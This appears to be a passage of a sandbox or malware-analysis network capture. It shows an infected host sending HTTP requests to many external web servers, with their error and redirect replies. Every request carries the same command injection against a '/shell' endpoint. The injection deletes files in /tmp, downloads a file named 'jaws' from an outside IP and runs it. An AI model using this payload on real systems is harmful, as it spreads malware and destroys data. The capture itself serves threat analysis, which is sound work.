                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Debian) Server at 127.0.0.1 Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            191192.168.2.2344992222.236.125.13780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:44.173873901 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:44.462770939 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:31:44 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            192192.168.2.2344318103.68.30.18280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:44.329313040 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:44.688205004 CET321INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.24.0
                                                            Date: Fri, 26 Jan 2024 14:31:44 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 157
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            193192.168.2.235159267.7.139.18680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:44.584489107 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:44.705979109 CET321INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.22.0
                                                            Date: Fri, 26 Jan 2024 14:31:44 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 157
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.0</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            194192.168.2.2358404154.197.204.14580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:44.628403902 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:44.793844938 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 02:26:38 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            195192.168.2.233875451.132.35.11680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:44.773755074 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            196192.168.2.2355956195.87.80.16580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:44.820074081 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:45.055886984 CET452INHTTP/1.1 301 Moved Permanently
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Fri, 26 Jan 2024 14:31:44 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 178
                                                            Connection: keep-alive
                                                            Location: https://127.0.0.1/shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            197192.168.2.235765291.220.229.24980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:44.826702118 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:45.039814949 CET506INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:31:45 GMT
                                                            Server: Apache/2.4.52 (Debian)
                                                            Content-Length: 312
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 6e 61 6d 65 2e 73 65 6c 65 63 74 65 6c 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Debian) Server at hostname.selectel.ru Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            198192.168.2.233526095.217.64.1480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:44.835062981 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:45.056291103 CET512INHTTP/1.1 301 Moved Permanently
                                                            Server: nginx/1.10.3 (Ubuntu)
                                                            Date: Fri, 26 Jan 2024 14:31:44 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 194
                                                            Connection: keep-alive
                                                            Location: https://127.0.0.1/shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws
                                                            Strict-Transport-Security: max-age=2592000
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            199192.168.2.2355390147.46.47.20180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:44.866075993 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:45.148904085 CET159INHTTP/1.0 302 Found
                                                            Location: http://127.0.0.1:80/003508235313/shell?cd+/tmp;rm+-rf+*;wget+
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            200192.168.2.234553454.79.81.18780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:44.904506922 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:45.195224047 CET401INHTTP/1.1 301 Moved Permanently
                                                            Server: awselb/2.0
                                                            Date: Fri, 26 Jan 2024 14:31:45 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 134
                                                            Connection: keep-alive
                                                            Location: https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            201192.168.2.233838664.9.223.3880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:47.344533920 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:48.037286043 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:48.869028091 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:50.500864983 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:50.900789022 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:51.716595888 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:53.348383904 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:54.025810957 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:54.852266073 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:56.483920097 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:57.146095991 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:57.955692053 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:59.587496042 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:00.265988111 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:01.091284037 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:02.723073006 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:03.386658907 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:04.194962978 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:05.826699018 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:06.505940914 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:07.330384970 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:08.962213039 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:09.625968933 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:10.433933973 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:12.065740108 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:12.746181965 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:13.569518089 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:15.205281973 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:15.866198063 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:16.673089981 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:18.304836035 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:18.986089945 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
